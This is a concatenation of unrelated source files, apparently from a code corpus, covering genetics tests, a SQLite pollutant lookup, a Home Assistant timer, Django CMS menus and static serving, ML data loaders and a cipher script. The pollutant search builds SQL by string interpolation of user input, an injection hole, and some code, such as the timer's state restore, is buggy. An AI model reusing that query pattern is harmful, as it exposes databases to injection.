[0, 2], [2, 0], [1, 1], [0, 2]] num, den = allel.patterson_d(aca, acb, acc, acd) expect_num = [0., 1., -1., 0., np.nan] expect_den = [0., 1., 1., 0.25, np.nan] assert_array_almost_equal(expect_num, num) assert_array_almost_equal(expect_den, den) class TestSF(unittest.TestCase): def test_sfs(self): dac = [0, 1, 2, 1] expect = [1, 2, 1] actual = allel.sfs(dac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': daca = np.asarray(dac, dtype=dtype) actual = allel.sfs(daca) aeq(expect, actual) def test_sfs_folded(self): ac = [[0, 3], [1, 2], [2, 1]] expect = [1, 2] actual = allel.sfs_folded(ac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': aca = np.asarray(ac, dtype=dtype) actual = allel.sfs_folded(aca) aeq(expect, actual) def test_sfs_scaled(self): dac = [0, 1, 2, 1] expect = [0, 2, 2] actual = allel.sfs_scaled(dac) aeq(expect, actual) for dtype in 'u2', 'i2', 'u8', 'i8': daca = np.asarray(dac, dtype=dtype) actual = allel.sfs_scaled(daca) aeq(expect, actual)
the-stack_106_24329
from __future__ import annotations import sqlite3 from collections import defaultdict from contextlib import closing, contextmanager from importlib import resources from pathlib import Path from typing import Iterator def summary() -> Path: with resources.path(__package__, "summary.sqlite") as path: return path class DB: """ In DB containing the available country and pollutants """ db = sqlite3.connect(f"file:{summary()}?mode=ro", uri=True) @classmethod @contextmanager def cursor(cls) -> Iterator[sqlite3.Cursor]: """db cursor as a "self closing" context manager""" with closing(cls.db.cursor()) as cur: yield cur @classmethod def countries(cls) -> list[str]: """ Get the list of unique countries from the summary. :return: list of available country codes """ with cls.cursor() as cur: cur.execute("SELECT country_code FROM countries;") return list(row[0] for row in cur.fetchall()) @classmethod def pollutants(cls) -> dict[str, str]: """ Get the list of unique pollutants from the summary. :param summary: The E1a summary. :return: The available pollutants, as a dictionary with with name as keys with name as values, e.g. {"NO": "38", ...} """ with cls.cursor() as cur: cur.execute("SELECT pollutant, pollutant_id FROM pollutants;") return dict(cur.fetchall()) @classmethod def search_pollutant( cls, query: str, *, limit: int | None = None ) -> dict[str, int]: """ Search for a pollutant's ID number based on its name. :param query: The pollutant to search for. :param limit: (optional) Max number of results. :return: The best pollutant matches, as a dictionary with with name as keys with name as values, e.g. {"NO": 38, ...} """ with cls.cursor() as cur: cur.execute( f""" SELECT pollutant, pollutant_id FROM pollutants WHERE pollutant LIKE '%{query}%' {f"LIMIT {limit}" if limit else ""}; """ ) return dict(cur.fetchall()) @classmethod def pollutants_per_country(cls) -> dict[str, dict[str, int]]: """ Get the available pollutants per country from the summary. :return: All available pollutants per country, as a dictionary with with country code as keys and a dictionary of pollutant/ids (e.g. {"NO": 38, ...}) as values. """ with cls.cursor() as cur: cur.execute( "SELECT country_code, pollutant, pollutant_id FROM summary" ) output: dict[str, dict[str, int]] = defaultdict(dict) for country_code, pollutant, pollutant_id in cur: output[country_code][pollutant] = pollutant_id return dict(output)
the-stack_106_24330
"""Support for Timers.""" from datetime import timedelta import logging import voluptuous as vol from homeassistant.const import ATTR_ENTITY_ID, CONF_ICON, CONF_NAME import homeassistant.helpers.config_validation as cv from homeassistant.helpers.entity_component import EntityComponent from homeassistant.helpers.event import async_track_point_in_utc_time from homeassistant.helpers.restore_state import RestoreEntity import homeassistant.util.dt as dt_util _LOGGER = logging.getLogger(__name__) DOMAIN = 'timer' ENTITY_ID_FORMAT = DOMAIN + '.{}' DEFAULT_DURATION = 0 ATTR_DURATION = 'duration' ATTR_REMAINING = 'remaining' CONF_DURATION = 'duration' STATUS_IDLE = 'idle' STATUS_ACTIVE = 'active' STATUS_PAUSED = 'paused' EVENT_TIMER_FINISHED = 'timer.finished' EVENT_TIMER_CANCELLED = 'timer.cancelled' EVENT_TIMER_STARTED = 'timer.started' EVENT_TIMER_RESTARTED = 'timer.restarted' EVENT_TIMER_PAUSED = 'timer.paused' SERVICE_START = 'start' SERVICE_PAUSE = 'pause' SERVICE_CANCEL = 'cancel' SERVICE_FINISH = 'finish' SERVICE_SCHEMA = vol.Schema({ vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids, }) SERVICE_SCHEMA_DURATION = vol.Schema({ vol.Optional(ATTR_ENTITY_ID): cv.comp_entity_ids, vol.Optional(ATTR_DURATION, default=timedelta(DEFAULT_DURATION)): cv.time_period, }) CONFIG_SCHEMA = vol.Schema({ DOMAIN: cv.schema_with_slug_keys( vol.Any({ vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_ICON): cv.icon, vol.Optional(CONF_DURATION, timedelta(DEFAULT_DURATION)): cv.time_period, }, None) ) }, extra=vol.ALLOW_EXTRA) async def async_setup(hass, config): """Set up a timer.""" component = EntityComponent(_LOGGER, DOMAIN, hass) entities = [] for object_id, cfg in config[DOMAIN].items(): if not cfg: cfg = {} name = cfg.get(CONF_NAME) icon = cfg.get(CONF_ICON) duration = cfg.get(CONF_DURATION) entities.append(Timer(hass, object_id, name, icon, duration)) if not entities: return False component.async_register_entity_service( SERVICE_START, SERVICE_SCHEMA_DURATION, 'async_start') component.async_register_entity_service( SERVICE_PAUSE, SERVICE_SCHEMA, 'async_pause') component.async_register_entity_service( SERVICE_CANCEL, SERVICE_SCHEMA, 'async_cancel') component.async_register_entity_service( SERVICE_FINISH, SERVICE_SCHEMA, 'async_finish') await component.async_add_entities(entities) return True class Timer(RestoreEntity): """Representation of a timer.""" def __init__(self, hass, object_id, name, icon, duration): """Initialize a timer.""" self.entity_id = ENTITY_ID_FORMAT.format(object_id) self._name = name self._state = STATUS_IDLE self._duration = duration self._remaining = self._duration self._icon = icon self._hass = hass self._end = None self._listener = None @property def should_poll(self): """If entity should be polled.""" return False @property def name(self): """Return name of the timer.""" return self._name @property def icon(self): """Return the icon to be used for this entity.""" return self._icon @property def state(self): """Return the current value of the timer.""" return self._state @property def state_attributes(self): """Return the state attributes.""" return { ATTR_DURATION: str(self._duration), ATTR_REMAINING: str(self._remaining) } async def async_added_to_hass(self): """Call when entity is about to be added to Home Assistant.""" # If not None, we got an initial value. if self._state is not None: return state = await self.async_get_last_state() self._state = state and state.state == state async def async_start(self, duration): """Start a timer.""" if self._listener: self._listener() self._listener = None newduration = None if duration: newduration = duration event = EVENT_TIMER_STARTED if self._state == STATUS_PAUSED: event = EVENT_TIMER_RESTARTED self._state = STATUS_ACTIVE # pylint: disable=redefined-outer-name start = dt_util.utcnow() if self._remaining and newduration is None: self._end = start + self._remaining else: if newduration: self._duration = newduration self._remaining = newduration else: self._remaining = self._duration self._end = start + self._duration self._hass.bus.async_fire(event, {"entity_id": self.entity_id}) self._listener = async_track_point_in_utc_time(self._hass, self.async_finished, self._end) await self.async_update_ha_state() async def async_pause(self): """Pause a timer.""" if self._listener is None: return self._listener() self._listener = None self._remaining = self._end - dt_util.utcnow() self._state = STATUS_PAUSED self._end = None self._hass.bus.async_fire(EVENT_TIMER_PAUSED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_cancel(self): """Cancel a timer.""" if self._listener: self._listener() self._listener = None self._state = STATUS_IDLE self._end = None self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_CANCELLED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_finish(self): """Reset and updates the states, fire finished event.""" if self._state != STATUS_ACTIVE: return self._listener = None self._state = STATUS_IDLE self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_FINISHED, {"entity_id": self.entity_id}) await self.async_update_ha_state() async def async_finished(self, time): """Reset and updates the states, fire finished event.""" if self._state != STATUS_ACTIVE: return self._listener = None self._state = STATUS_IDLE self._remaining = timedelta() self._hass.bus.async_fire(EVENT_TIMER_FINISHED, {"entity_id": self.entity_id}) await self.async_update_ha_state()
the-stack_106_24332
# -*- coding: utf-8 -*- import re from menus.menu_pool import menu_pool from menus.base import Menu, NavigationNode, Modifier from cms.utils import get_language_from_request from cms.utils.moderator import get_page_queryset, get_title_queryset from django.conf import settings from django.contrib.sites.models import Site from django.core.exceptions import ObjectDoesNotExist from cms.utils.i18n import get_fallback_languages from cms.apphook_pool import apphook_pool from cms.models.titlemodels import Title def page_to_node(page, home, cut): parent_id = page.parent_id if home and page.parent_id == home.pk and cut: parent_id = None # possible fix for a possible problem #if parent_id and not page.parent.get_calculated_status(): # parent_id = None # ???? attr = {'soft_root':page.soft_root, 'auth_required':page.login_required, 'reverse_id':page.reverse_id,} if page.limit_visibility_in_menu == None: attr['visible_for_authenticated'] = True attr['visible_for_anonymous'] = True else: attr['visible_for_authenticated'] = page.limit_visibility_in_menu == 1 attr['visible_for_anonymous'] = page.limit_visibility_in_menu == 2 if page.pk == home.pk: attr['is_home'] = True # add various times and (maybe) excerpts attr['creation_date'] = page.creation_date attr['publication_date'] = page.publication_date attr['thumbnail'] = None # extracting excerpt... # XXX EXPENSIVE OPERATION!!! attr['excerpt'] = page.get_text_excerpt() extenders = [] if page.navigation_extenders: extenders.append(page.navigation_extenders) try: app_name = page.get_application_urls(fallback=False) except Title.DoesNotExist: app_name = None if app_name: app = apphook_pool.get_apphook(app_name) for menu in app.menus: extenders.append(menu.__name__) attr['redirect_url'] = page.get_redirect() # save redirect URL is any if extenders: attr['navigation_extenders'] = extenders ret_node = NavigationNode( page.get_menu_title(), page.get_absolute_url(), page.pk, parent_id, attr=attr, visible=page.in_navigation, ) return ret_node class CMSMenu(Menu): def get_nodes(self, request): page_queryset = get_page_queryset(request) site = Site.objects.get_current() lang = get_language_from_request(request) filters = { 'site':site, } if settings.CMS_HIDE_UNTRANSLATED: filters['title_set__language'] = lang pages = page_queryset.published().filter(**filters).order_by("tree_id", "lft") ids = [] nodes = [] first = True home_cut = False home_children = [] home = None for page in pages: if not home: home = page page.home_pk_cache = home.pk if first and page.pk != home.pk: home_cut = True if (page.parent_id == home.pk or page.parent_id in home_children) and home_cut: page.home_cut_cache = True home_children.append(page.pk) if (page.pk == home.pk and home.in_navigation) or page.pk != home.pk: first = False ids.append(page.id) titles = list(get_title_queryset(request).filter(page__in=ids, language=lang)) for page in pages:# add the title and slugs and some meta data for title in titles: if title.page_id == page.pk: if not hasattr(page, "title_cache"): page.title_cache = {} page.title_cache[title.language] = title nodes.append(page_to_node(page, home, home_cut)) ids.remove(page.pk) if ids: # get fallback languages fallbacks = get_fallback_languages(lang) for l in fallbacks: titles = list(get_title_queryset(request).filter(page__in=ids, language=l)) for title in titles: for page in pages:# add the title and slugs and some meta data if title.page_id == page.pk: if not hasattr(page, "title_cache"): page.title_cache = {} page.title_cache[title.language] = title nodes.append(page_to_node(page, home, home_cut)) ids.remove(page.pk) break if not ids: break return nodes menu_pool.register_menu(CMSMenu) class NavExtender(Modifier): def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb): if post_cut: return nodes exts = [] # rearrange the parent relations home = None for node in nodes: if node.attr.get("is_home", False): home = node extenders = node.attr.get("navigation_extenders", None) if extenders: for ext in extenders: if not ext in exts: exts.append(ext) for n in nodes: if n.namespace == ext and not n.parent_id:# if home has nav extenders but home is not visible if node.attr.get("is_home", False) and not node.visible: n.parent_id = None n.parent_namespace = None n.parent = None else: n.parent_id = node.id n.parent_namespace = node.namespace n.parent = node node.children.append(n) removed = [] # find all not assigned nodes for menu in menu_pool.menus.items(): if hasattr(menu[1], 'cms_enabled') and menu[1].cms_enabled and not menu[0] in exts: for node in nodes: if node.namespace == menu[0]: removed.append(node) if breadcrumb: # if breadcrumb and home not in navigation add node if breadcrumb and home and not home.visible: home.visible = True if request.path == home.get_absolute_url(): home.selected = True else: home.selected = False # remove all nodes that are nav_extenders and not assigned for node in removed: nodes.remove(node) return nodes menu_pool.register_modifier(NavExtender) class SoftRootCutter(Modifier): """ If anyone understands this, PLEASE write a meaningful description here! """ def modify(self, request, nodes, namespace, root_id, post_cut, breadcrumb): # only apply this modifier if we're pre-cut (since what we do is cut) if post_cut or not settings.CMS_SOFTROOT: return nodes selected = None root_nodes = [] # find the selected node as well as all the root nodes for node in nodes: if node.selected: selected = node if not node.parent: root_nodes.append(node) # if we found a selected ... if selected: # and the selected is a softroot if selected.attr.get("soft_root", False): # get it's descendants nodes = selected.get_descendants() # remove the link to parent selected.parent = None # make the selected page the root in the menu nodes = [selected] + nodes else: # if it's not a soft root, walk ancestors (upwards!) nodes = self.find_ancestors_and_remove_children(selected, nodes) # remove child-softroots from descendants (downwards!) nodes = self.find_and_remove_children(selected, nodes) else: # for all nodes in root, remove child-sofroots (downwards!) for node in root_nodes: self.find_and_remove_children(node, nodes) return nodes def find_and_remove_children(self, node, nodes): for n in node.children: if n.attr.get("soft_root", False): self.remove_children(n, nodes) return nodes def remove_children(self, node, nodes): for n in node.children: nodes.remove(n) self.remove_children(n, nodes) node.children = [] def find_ancestors_and_remove_children(self, node, nodes): """ Check ancestors of node for soft roots """ if node.parent: if node.parent.attr.get("soft_root", False): nodes = node.parent.get_descendants() node.parent.parent = None nodes = [node.parent] + nodes else: nodes = self.find_ancestors_and_remove_children(node.parent, nodes) else: for n in nodes: if n != node and not n.parent: self.find_and_remove_children(n, nodes) for n in node.children: if n != node: self.find_and_remove_children(n, nodes) return nodes menu_pool.register_modifier(SoftRootCutter) # vim:ai:et:ts=4:sw=4:sts=4:ff=unix:fenc=utf8:
the-stack_106_24333
MIN_BATCH = 5 LOSS_V = .5 # v loss coefficient LOSS_ENTROPY = .01 # entropy coefficient LEARNING_RATE = 5e-3 RMSPropDecaly = 0.99 # Params of advantage (Bellman equation) GAMMA = 0.99 N_STEP_RETURN = 5 GAMMA_N = GAMMA ** N_STEP_RETURN TRAIN_WORKERS = 10 # Thread number of learning. TEST_WORKER = 1 # Thread number of testing (default 1) MAX_STEPS = 20 # Maximum step number. MAX_TRAIN_NUM = 5000 # Learning number of each thread. Tmax = 5 # Updating step period of each thread. # Params of epsilon greedy EPS_START = 0.5 EPS_END = 0.0
the-stack_106_24335
import torch from torchvision import datasets, transforms from torch.utils.data import random_split def data_generator(root, batch_size): train_set = datasets.MNIST(root=root, train=True, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,)) ])) train_set, val_set = random_split(train_set, [50000, 10000],) #generator=torch.Generator().manual_seed(42)) test_set = datasets.MNIST(root=root, train=False, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,)) ])) print(f"train: {len(train_set)}\tval: {len(val_set)}\ttest: {len(test_set)}") train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, num_workers=12) val_loader = torch.utils.data.DataLoader(val_set, batch_size=batch_size, num_workers=12) test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size, num_workers=12) return train_loader, val_loader, test_loader def count_model_params(model): """ Returns number of trainable and non-trainable parameters in a model. :param model: A PyTorch nn.Module object. :return: A tuple (train_params_count, non_train_params_count) """ train_params_count = 0 non_train_params_count = 0 for p in model.parameters(): if p.requires_grad: train_params_count += p.numel() else: non_train_params_count += p.numel() return train_params_count, non_train_params_count
the-stack_106_24336
# this file contains code for a permuted graph topologies experiment # (we permute columns and rows of the adjacency matrix and check the # resulting neural networks fits) import numpy as np import pandas as pd import tensorflow as tf from sklearn.model_selection import train_test_split import os import graph_utils as graph_utils import graph_neural_networks as graph_nn import data_preparation_utils as data_prep from iterative_updaters import VanillaGradientDescent, MomentumGradientDescent, NesterovMomentumGradientDescent, RMSPropGradientDescent, AdamGradientDescent import training_and_evaluation as train_eval import graph_nn_experiments as experiments os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # uncomment this when GPU is supposed to be used if tf.test.gpu_device_name(): print('GPU found') else: print("No GPU found") if __name__ == '__main__': ochota_adj_matrix = np.genfromtxt("macierz_sasiedztwa.txt") print("Loaded adjacency matrix") toy_data = pd.read_csv("toy_set.csv", header=None) print("Read datafile") X, y, X_scaler, y_scaler = data_prep.scale_standard_traffic_light_data(toy_data) print("Scaled the data") X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=831191) print("Divided the data into train/test sets") numbers_of_transpositions = list(range(22)) no_of_samples = 100 numbers_of_transpositions *= no_of_samples file_to_save_results = "toy_permuted_topologies_0.csv" with open(file_to_save_results,"a") as f: for i in numbers_of_transpositions: print("Constructing random adjacency matrix with %d transpositions" % i) random_permutation = graph_utils.generate_random_permutation_with_approx_no_of_transpositions(21, i) random_adj_matrix = ochota_adj_matrix[random_permutation][:,random_permutation] symmetric_diff = graph_utils.undirected_symmetric_difference(random_adj_matrix, ochota_adj_matrix) tf.reset_default_graph() nn_input = tf.placeholder(dtype=tf.float32, shape=[None, 21]) targets = tf.placeholder(dtype=tf.float32, shape=[None, 1]) print("Constructing graph neural net") nn_output = graph_nn.transfer_matrix_neural_net(nn_input, 3, 4, tf.nn.tanh, random_adj_matrix, verbose=False) optimizer = tf.train.AdamOptimizer(0.005) batch_iterator = data_prep.BatchIterator(X_train, y_train, 997) print("Training network with symmetric diff %d" % symmetric_diff) test_and_batch_losses = train_eval.train_model(nn_output, nn_input, targets, optimizer, 100000, batch_iterator, X_test, y_test, "trained_networks/toy_permuted_model_tmp.ckpt", 1000, verbose=True) test_loss = test_and_batch_losses[-1][0] model_avg_error, actual_vs_predicted = train_eval.evaluate_model_on_a_dataset("trained_networks/toy_permuted_model_tmp.ckpt", nn_output,nn_input, X_test, y_test, y_scaler) test_loss = test_and_batch_losses[-1][0] f.write("%d,%f\n" % (i, test_loss)) f.flush() print((i, symmetric_diff, test_loss)) # old version with error, symmetric diff missing here #print((i, test_loss)) # old version, no good for this toy problem: #f.write("%d,%d,%f,%f\n" % (i, symmetric_diff, model_avg_error, test_loss)) #f.flush() #print((symmetric_diff, model_avg_error, test_loss)) f.close()
the-stack_106_24337
## ## data_loader.py ## Load in brick/ball/cylinder examples for programming challenge. ## import numpy as np from easydict import EasyDict import glob import cv2 def data_loader(label_indices, channel_means, train_test_split = 0.7, input_image_size = (227, 227), data_path = '../data'): ''' Load, resize, subtract mean, and store data in easydicts. ''' num_classes = len(label_indices) #Covert Channel means list to array channel_means = np.array(channel_means) #Pull in image filenames: im_paths = glob.glob(data_path + '/*/*.jpg') #Train test split num_training_examples = int(np.round(train_test_split*len(im_paths))) num_testing_examples = len(im_paths) - num_training_examples random_indices = np.arange(len(im_paths)) np.random.shuffle(random_indices) training_indices = random_indices[:num_training_examples] testing_indices = random_indices[num_training_examples:] #Make easydicts for data data = EasyDict() data.train = EasyDict() data.test = EasyDict() # Make empty arrays to hold data: data.train.X = np.zeros((num_training_examples, input_image_size[0], input_image_size[1], 3), dtype = 'float32') data.train.y = np.zeros((num_training_examples, num_classes), dtype = 'float32') data.test.X = np.zeros((num_testing_examples, input_image_size[0], input_image_size[1], 3), dtype = 'float32') data.test.y = np.zeros((num_testing_examples, num_classes), dtype = 'float32') for count, index in enumerate(training_indices): im = cv2.imread(im_paths[index]) im = cv2.resize(im, (input_image_size[1], input_image_size[0])) data.train.X[count, :, :, :] = im - channel_means class_name = im_paths[index].split('/')[-2] data.train.y[count, label_indices[class_name]] = 1 for count, index in enumerate(testing_indices): im = cv2.imread(im_paths[index]) im = cv2.resize(im, (input_image_size[1], input_image_size[0])) data.test.X[count, :, :, :] = im - channel_means class_name = im_paths[index].split('/')[-2] data.test.y[count, label_indices[class_name]] = 1 print('Loaded', str(len(training_indices)), 'training examples and ', str(len(testing_indices)), 'testing examples. ') return data
the-stack_106_24338
#! /usr/bin/env python # -*- coding:UTF-8 -*- """ Views and functions for serving static files. These are only to be used during development, and SHOULD NOT be used in a production setting. """ import mimetypes import os import posixpath import re import stat from django.http import ( FileResponse, Http404, HttpResponse, HttpResponseNotModified, ) from django.template import Context, Engine, TemplateDoesNotExist, loader from django.utils._os import safe_join from django.utils.http import http_date, parse_http_date from django.utils.translation import gettext as _, gettext_lazy def serve(request, path, document_root=None, show_indexes=False): """ Serve static files below a given point in the directory structure. To use, put a URL pattern such as:: from django.views.static import serve url(r'^(?P<path>.*)$', serve, {'document_root': '/path/to/my/files/'}) in your URLconf. You must provide the ``document_root`` param. You may also set ``show_indexes`` to ``True`` if you'd like to serve a basic index of the directory. This index view will use the template hardcoded below, but if you'd like to override it, you can create a template called ``static/directory_index.html``. """ path = posixpath.normpath(path).lstrip('/') fullpath = safe_join(document_root, path) if os.path.isdir(fullpath): if show_indexes: return directory_index(path, fullpath) raise Http404(_("Directory indexes are not allowed here.")) if not os.path.exists(fullpath): raise Http404(_('"%(path)s" does not exist') % {'path': fullpath}) # Respect the If-Modified-Since header. statobj = os.stat(fullpath) if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'), statobj.st_mtime, statobj.st_size): return HttpResponseNotModified() content_type, encoding = mimetypes.guess_type(fullpath) content_type = content_type or 'application/octet-stream' response = FileResponse(open(fullpath, 'rb'), content_type=content_type) response["Last-Modified"] = http_date(statobj.st_mtime) if stat.S_ISREG(statobj.st_mode): response["Content-Length"] = statobj.st_size if encoding: response["Content-Encoding"] = encoding return response DEFAULT_DIRECTORY_INDEX_TEMPLATE = """ {% load i18n %} <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="NONE,NOARCHIVE" /> <title>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</title> </head> <body> <h1>{% blocktrans %}Index of {{ directory }}{% endblocktrans %}</h1> <ul> {% if directory != "/" %} <li><a href="../">../</a></li> {% endif %} {% for f in file_list %} <li><a href="{{ f|urlencode }}">{{ f }}</a></li> {% endfor %} </ul> </body> </html> """ template_translatable = gettext_lazy("Index of %(directory)s") def directory_index(path, fullpath): try: t = loader.select_template([ 'static/directory_index.html', 'static/directory_index', ]) except TemplateDoesNotExist: t = Engine(libraries={'i18n': 'django.templatetags.i18n'}).from_string(DEFAULT_DIRECTORY_INDEX_TEMPLATE) c = Context() else: c = {} files = [] for f in os.listdir(fullpath): if not f.startswith('.'): if os.path.isdir(os.path.join(fullpath, f)): f += '/' files.append(f) c.update({ 'directory': path + '/', 'file_list': files, }) return HttpResponse(t.render(c)) def was_modified_since(header=None, mtime=0, size=0): """ 自从最后一次下载后用户是否修改了? Was something modified since the user last downloaded it? header This is the value of the If-Modified-Since header. If this is None, I'll just return True. mtime This is the modification time of the item we're talking about. size This is the size of the item we're talking about. """ try: if header is None: raise ValueError matches = re.match(r"^([^;]+)(; length=([0-9]+))?$", header, re.IGNORECASE) header_mtime = parse_http_date(matches.group(1)) header_len = matches.group(3) if header_len and int(header_len) != size: raise ValueError if int(mtime) > header_mtime: raise ValueError except (AttributeError, ValueError, OverflowError): return True # 修改了 return False
the-stack_106_24340
from operator import itemgetter cancerlist = ["ACC", "BLCA", "BRCA", "CESC", "CHOL", "COAD", "DLBC", "ESCA", "GBM", "HNSC", "KICH", "KIRC", "KIRP", "LGG", "LIHC", "LUAD", "LUSC", "MESO", "OV", "PAAD", "PCPG", "PRAD", "READ", "SARC", "SKCM", "STAD", "TGCT", "THCA", "THYM", "UCEC", "UCS", "UVM"] #cancerlist = ["PANCANCER"] input_file1 = [] input_file2 = [] probe_count = 485577 p_threshold = [0.05, 0.005, 0.0005, 0.0000001] sample_id = [] cytoact = [] sample_index = [] def GetSample() : cytoact_file = open("TCGA_methylation_cowork_1.txt", 'r') header = cytoact_file.readline().split() # getting header id_posit = header.index("id") # sample ID positioning cytoact_posit = header.index("CytAct") # CytAct positioning cytodata = cytoact_file.readlines() # read data table cytoact_file.close() count = 0 global sample_id global cytoact for line in cytodata : line = line.split() sample_id.append(line[id_posit].replace('_', '')) # sample ID extraction cytoact.append(float(line[cytoact_posit])) # CytAct extraction count += 1 return count # Sample number return sample_number = GetSample() percentage = [0.01, 0.025, 0.05, 0.1, 0.125, 0.15, 0.175, 0.2, 0.225, 0.25, 0.275, 0.3] for i in range(0, len(cancerlist)) : input_tumor = open(cancerlist[i] + ".humanmethylation450.tumor.txt", 'r') sample_header1 = input_tumor.readline().split() # sample line input_tumor.readline() # junk line ############################################################################################################################################################################ # make sample index table del sample_header1[0]; del sample_header1[0] sample_index = [] sample_binary_table = [] length = len(sample_header1) for j in range(0, length) : sample_header1[j] = sample_header1[j][:15].replace('-', '') if(sample_header1[j] in sample_id) : sample_index.append(sample_id.index(sample_header1[j])) else : sample_index.append(-1) for j in range(len(p_threshold)) : sample_binary_table.append([]) for k in range(len(percentage)) : sample_binary_table[j].append([]) for l in range(length) : sample_binary_table[j][k].append(0) ############################################################################################################################################################################ whole_skew = []; whole_skew_index = [] for j in range(len(p_threshold)) : input_file = open(str(p_threshold[j]) + "." + cancerlist[i] + ".CpGsites.By.TTest.txt", 'r') input_file.readline() # junk line whole_skew.append([]) lines = input_file.readlines() for line in lines : # Derivation of meaningful CpG sites line = line.split() t_stat = float(line[1]) whole_skew[j].append(line[0]) whole_skew[j].append("END_POINT") whole_skew_index.append(0) for j in range(probe_count) : line1 = input_tumor.readline().split() site_id = line1.pop(0) ############################################################################################################################################################################ # getting betavalue for each cpg site betavalue_row = [] new_length = length for k in range(0, length) : if(line1[k] == "NA") : new_length -= 1 continue betavalue_row.append([float(line1[k]), k]) betavalue_row.sort(key = itemgetter(0)) ############################################################################################################################################################################ if(new_length > 0) : for k in range(len(p_threshold)) : if(whole_skew[k][whole_skew_index[k]] == site_id) : for percentage_i in range(len(percentage)) : threshold = int(new_length * percentage[percentage_i]) for l in range(threshold) : sample_binary_table[k][percentage_i][betavalue_row[new_length - l - 1][1]] += 1 for l in range(threshold) : sample_binary_table[k][percentage_i][betavalue_row[l][1]] += 1 whole_skew_index[k] += 1 if(j % 10000 == 0) : print(cancerlist[i] + " %d completed." % j) for j in range(len(p_threshold)) : for k in range(len(percentage)) : output_file = open("Pvalue." + str(p_threshold[j]) + ".Percentage." + str(percentage[k]) + "." + cancerlist[i] + ".Both.MeaningfulCpGsites.By.Ttest_Binarization.Summation.txt", 'w') for l in range(length) : printline = sample_header1[l] + "\t%s\n" % str(sample_binary_table[j][k][l]) output_file.write(printline)
the-stack_106_24343
import pandas as pd import matplotlib as plt def teamSearch(teamName): teams = pd.read_html("https://en.wikipedia.org/wiki/Wikipedia:WikiProject_National_Basketball_Association/National_Basketball_Association_team_abbreviations", header=0) team_names = pd.DataFrame(columns=["Abbreviation/Acronym", "Franchise"]) team_names = team_names.append(teams) for row in team_names.itertuples(index=False, name="Pandas"): if row[1] == teamName: teamName = row[0] break return teamName # def main(): # stats = pd.read_csv("https://rotogrinders.com/projected-stats/nba-player.csv?site=fanduel", delimiter=",", header=None, names=["Name", "Salary", "Team", "Position", "Opposing", "Ceiling", "Floor", "Points"]) # # for row in stats.itertuples(index = False, name = "Pandas"): # row[0].strip().title() # # searchType = input("Search by team name or player name? (team/player) ").title() # if searchType == "Player": # player = input("Which player? ").strip() # for row in stats.itertuples(index = False, name = "Pandas"): # if row[0] == player: # print(row) # break # elif searchType == "Team": # team = input("Which team? ") # team = teamSearch(team) # for row in stats.itertuples(index = False, name = "Pandas"): # if row[2] == team: # print(row) def main(): stats = pd.read_csv("https://rotogrinders.com/projected-stats/nba-player.csv?site=fanduel", delimiter=",", header = None, names = ["Name", "Salary", "Team", "Position", "Opposing", "Ceiling", "Floor", "Points"]) for row in stats.itertuples(index=False, name="Pandas"): row[0].strip().title() stats.plot(x = "Floor", y = "Ceiling") print("plotted") main()
the-stack_106_24344
import codecs alphabet = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZzАаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфЦцЧчШшЩщХхЬьЪъЫыЭэЮюЯяΨ&Ǻλ∆0123456789!•−⋅→.—"‘±’,/\?%#@^$*+-_– №:;©‐[]=|(){}<>«»\r\n\ufeff\t' filename = "hello.txt" file_alphabet = "alphabet.txt" m = [] word_mass = [] word_size = [] index_word = [] index_key = [] secret = [] secret_word = [] test = [] test2 = [] no_found = [] k = 0 h = 0 z1 = 0 z2 = 0 u = '\n\r\ufeff' numb = int(input("1)Ввод с клавиатуры \n"+"2)Чтения из файла \n")) key = input("key: ") if numb == 1: word = input("message: ") v = 0 if numb == 2: with codecs.open(filename,'r', encoding = "utf8") as file: # --> файл нужно сохранять в UTF-8 кодировки word_txt = file.readlines() for i in range(0, len(word_txt)): word_size.append(word_txt[i]) print("message: ",word_size) word = ''.join(word_size) with codecs.open(file_alphabet,'r', encoding = "utf8") as file: # --> файл нужно сохранять в UTF-8 кодировки f_alphabet = file.readlines() for i in range(0, len(f_alphabet)): test2.append(f_alphabet[i]) ######################################################################## for i in range(0,len(word)): test.append(word[i]) ######################################################################## c = 0 for j in range(0,len(test)): for i in range(0, len(alphabet)): if test[j] == alphabet[i]: c += 1 number = int(input(" 1)Шифрование \n"+" 2)Дешифрование \n")) ######################################################################## for i in range(0,len(test)): m.append(0) secret.append(0) secret_word.append(0) word_mass.append(test[i]) for i in range(0,len(test)): k = k + 1 m[i] = key[k-1] if k == len(key): k = 0 print(m) for i in range(0,len(test)): for j in range(0,len(alphabet)): if test[i] == alphabet[j]: index_word.append(j) z1 += 1 if m[i] == alphabet[j]: index_key.append(j) z2 += 1 if z1 != z2: print("error") h = 1 break if number == 1: secret[i] = index_word[i] + index_key[i] #для шифрования + для дешифровани - if secret[i] >= len(alphabet): secret[i] = secret[i] - len(alphabet) #для шифрования secret - len(alphabet) для дешифрования secret + len(alphabet) - index_key secret_word[i] = alphabet[secret[i]] if number == 2: secret[i] = index_word[i] - index_key[i] if secret[i] >= len(alphabet): secret[i] = secret[i] + len(alphabet) - index_key[i] secret_word[i] = alphabet[secret[i]] if h == 1: print(" z1 = ",z1,"\nz2 = ",z2) print(" no found: 